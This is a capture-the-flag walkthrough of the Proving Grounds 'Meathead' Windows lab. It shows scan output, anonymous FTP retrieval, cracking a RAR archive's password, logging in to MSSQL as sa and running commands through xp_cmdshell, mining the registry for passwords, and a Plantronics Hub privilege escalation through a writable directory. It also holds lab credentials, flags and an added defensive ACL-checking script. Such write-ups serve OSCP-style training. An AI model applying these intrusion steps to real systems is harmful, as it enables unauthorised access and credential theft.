Proving Grounds | Meathead

In this walkthrough, I demonstrate how I obtained complete ownership of Meathead from OffSec Proving Grounds.
In: Proving Grounds, TJ Null OSCP Practice, OSCP Prep, Attack, CTF, Windows, Medium Challenge

Nmap Results

# Nmap 7.92 scan initiated Mon Aug 29 23:02:31 2022 as: nmap -T5 -p80,135,139,445,1221,1435,3389,5985 -A -oA scan-all -Pn 192.168.179.70
Nmap scan report for 192.168.179.70
Host is up (0.081s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20  07:02PM                18866 Elementum Supremum.docx
| 04-27-20  07:02PM               764176 file_example_MP3_700KB.mp3
| 04-27-20  07:02PM                15690 img.jpg
| 04-27-20  07:02PM                  302 MSSQL_BAK.rar
| 04-27-20  07:02PM                  548 palindromes.txt
|_04-27-20  07:02PM                45369 server.jpg
| ftp-syst: 
|_  SYST: Windows_NT
1435/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-28T05:05:51
|_Not valid after:  2052-08-28T05:05:51
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|_  Product_Version: 10.0.17763
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|   Product_Version: 10.0.17763
|_  System_Time: 2022-08-30T03:03:19+00:00
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after:  2023-02-26T05:05:45
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-08-30T03:03:23
|_  start_date: N/A

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   80.90 ms 192.168.49.1
2   81.25 ms 192.168.179.70

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 23:04:00 2022 -- 1 IP address (1 host up) scanned in 89.54 seconds





Service Enumeration

TCP/139,445

Test for anonymous SMB enumeration.



TCP/1221

Test Anonymous FTP Access

Microsoft ftpd is running on this port. The nmap scan results show that anonymous logon is enabled.

Let's make a directory and store the files there.

mkdir ftp-files
ftp 192.168.179.70 1221
ftp> lcd ftp-files
ftp> prompt
ftp> mget *



Analyze the Files

MSSQL_BAK.rar

We can try to crack it with john, after extracting the archive's hash with the rar2john tool.

rar2john MSSQL_BAK.rar > hash.txt
john --wordlist=rockyou.txt hash.txt

Let's see if we can open the archive now.

Looks like some database admin credentials, possibly: sa:EjectFrailtyThorn425.



TCP/80

I don't recognise the icon on this page, but the URL for the image is http://192.168.179.70/images/plt-hub-orange.png. A Google search for the Plantronics Hub logo returns a match.

I check searchsploit for anything related to this product.

searchsploit plantronics

Looks like there are some privilege escalation possibilities to keep in our pocket for later.

Plantronics Hub 3.13.2 - Local Privilege Escalation                  | windows/local/47845.txt
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb



Gobuster Enumeration

gobuster dir -u http://192.168.179.70/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt

Nothing interesting with the gobuster enumeration.



TCP/1435

The nmap scan identifies this as Microsoft SQL Server 2017 14.00.1000. Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py to connect to the database and see what we can do.

mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70'

Once we're connected, we can run enable_xp_cmdshell to allow command execution (I found it was disabled when I first tested the client connection).

SQL> help
SQL> enable_xp_cmdshell
SQL> RECONFIGURE
SQL> xp_cmdshell whoami





Exploit

Details

The path to code execution on the host went as follows:

  1. Anonymous login to the FTP server allowed for retrieval of an MSSQL backup
  2. The backup was compressed in a password-protected .rar archive with a crackable password
  3. With the sa credentials recovered from the backup, we can execute arbitrary commands on the host through xp_cmdshell



Gaining a Foothold

Enable XP_CMDSHELL

We can use Impacket's mssqlclient.py script to connect to the MSSQL server. Then, we'll need to enable xp_cmdshell to run commands on the host.

mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70'

SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'whoami'
SQL> EXEC xp_cmdshell 'ipconfig'



No Reverse Shell

I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. I tried delivering with:

  • smbserver.py
  • Python web server

I verified the payloads made it onto the target, but no matter what I tried (encodings, scripts, binaries), nothing worked, which was frustrating to say the least.



Password Mining

I had a look around the file system for configuration files that might contain a password, but had no luck. So, I turned to the registry. My first registry search returned nothing.

EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s'

However, this search produced an interesting find.

EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s'

TwilightAirmailMuck234

Now, if we look at the output of the net user command, we can infer that this is either Administrator's or jane's password. We can test the password with smbclient.

Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host.

xfreerdp /v:'192.168.179.70' /u:'jane' /p:'TwilightAirmailMuck234'





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 MEATHEAD
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-70000-00000-AA207
Original Install Date:     4/27/2020, 9:52:21 PM
System Boot Time:          8/28/2022, 5:05:34 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,053 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,765 MB
Virtual Memory: In Use:    2,034 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\MEATHEAD
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB4552924
                           [02]: KB4462930
                           [03]: KB4494174
                           [04]: KB4512577
                           [05]: KB4537759
                           [06]: KB4549947
                           [07]: KB4551853
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.179.70
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Current User

USER INFORMATION
----------------

User Name     SID
============= =============================================
meathead\jane S-1-5-21-4244463105-466391970-2126029592-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON  Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled



Users and Groups

Local Users

User accounts for \\MEATHEAD

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
jane                     WDAGUtilityAccount

Local Groups

Aliases for \\MEATHEAD

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$WIN-OHNBE5J07GP
*Storage Replica Administrators
*System Managed Accounts Group
*Users



Network Configurations

Interfaces

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.179.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.179.254

Open Ports

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1221           0.0.0.0:0              LISTENING       2328
  TCP    0.0.0.0:1435           0.0.0.0:0              LISTENING       3424
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1008
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1060
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1348
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2044
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2264
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       604
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       616
  TCP    127.0.0.1:32017        0.0.0.0:0              LISTENING       6360
  TCP    127.0.0.1:32018        0.0.0.0:0              LISTENING       6360
  TCP    192.168.179.70:139     0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       852
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1221              [::]:0                 LISTENING       2328
  TCP    [::]:1435              [::]:0                 LISTENING       3424
  TCP    [::]:3389              [::]:0                 LISTENING       1008
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       484
  TCP    [::]:49665             [::]:0                 LISTENING       1060
  TCP    [::]:49666             [::]:0                 LISTENING       1348
  TCP    [::]:49667             [::]:0                 LISTENING       2044
  TCP    [::]:49668             [::]:0                 LISTENING       2264
  TCP    [::]:49669             [::]:0                 LISTENING       604
  TCP    [::]:49670             [::]:0                 LISTENING       616





Privilege Escalation

Writable Privileged Directory

Using the information found in my earlier service enumeration, we know that the installed version of Plantronics Hub is vulnerable to a local privilege escalation exploit. Copy the exploit to your working directory and have a look over the exploit details.

searchsploit -m 47845
less 47845.txt

You'll note that the exploit tells us to place a MajorUpgrade.config file in C:\ProgramData\Plantronics\Spokes3G, with a crafted payload in the configuration file. Let's double-check the ACL on the directory.

Indeed, it looks like BUILTIN\Users, an unprivileged group, has write access to a directory it shouldn't. That is the whole root cause here: a service running as SYSTEM consumes a file from a directory that any local user can write to.
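The same ACL check as an added Python triage helper, which is not part of the original writeup or of the Get-Spokes3GSystem script: it parses the text that icacls prints for a directory and reports low-privilege principals holding write-class rights, so a weak ACL can be compared against a hardened one. The icacls output below is constructed to mirror the misconfiguration described, using the Spokes3G path from the exploit; whether the author dumped the ACL with icacls is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `icacls C:\ProgramData\Plantronics\Spokes3G` output for the
# misconfigured state described above: BUILTIN\Users holds Modify (M) on the directory.
SAMPLE_PATH = "C:\\ProgramData\\Plantronics\\Spokes3G"
WEAK_ICACLS = """C:\\ProgramData\\Plantronics\\Spokes3G BUILTIN\\Users:(OI)(CI)(M)
                                    NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                                    BUILTIN\\Administrators:(I)(OI)(CI)(F)
                                    BUILTIN\\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
# Same directory after the explicit Modify grant is removed (also constructed).
HARDENED_ICACLS = """C:\\ProgramData\\Plantronics\\Spokes3G NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                                    BUILTIN\\Administrators:(I)(OI)(CI)(F)
                                    BUILTIN\\Users:(I)(OI)(CI)(RX)
"""

# Principals that should not be able to create files in a SYSTEM service's config directory.
LOW_PRIV = {"everyone", "builtin\\users", "builtin\\guests",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights tokens that allow creating, replacing or modifying files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WA", "WEA", "DC", "DE", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^()]*\))+)$")

def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, tokens) pairs; tokens mix inheritance flags and rights."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):            # only the first line carries the path prefix
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:                            # blank line or the trailing summary
            continue
        groups = re.findall(r"\(([^()]*)\)", m.group("flags"))
        aces.append((m.group("principal"), [t for g in groups for t in g.split(",")]))
    return aces

def writable_by_low_priv(output: str, path: str) -> Dict[str, List[str]]:
    """Low-privilege principals holding write-class allow rights, with those rights."""
    findings: Dict[str, List[str]] = {}
    for principal, tokens in parse_icacls(output, path):
        hits = sorted(set(tokens) & WRITE_RIGHTS)
        if "DENY" not in tokens and principal.lower() in LOW_PRIV and hits:
            findings[principal] = sorted(set(findings.get(principal, [])) | set(hits))
    return findings
```

On a real host you would feed it the captured icacls output for the service's configuration directory; an empty result is the state that closes this escalation path.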



Execute the Exploit

I wrote a PowerShell script to automate the process. When I tried running the commands individually, the file would be deleted too quickly and a SYSTEM shell would not spawn. So, I wrote a script that props the file open while the payload is written to it and spawns the shell. Usage examples are provided in the repo.

GitHub - 0xBEN/Get-Spokes3GSystem: PowerShell script to aid in the automation of local privilege escalation path with the SpokesUpdateService

Download the script file to the target and run the script.

Default payload: cmd.exe
Custom payload: powershell.exe





Flags

C:\users\jane\Desktop\local.txt

32d5ddc986de6979a730ef057c17df82

C:\users\Administrator\Desktop\local.txt

7ab84514f5dff5f19ec54f23b6b4bfc7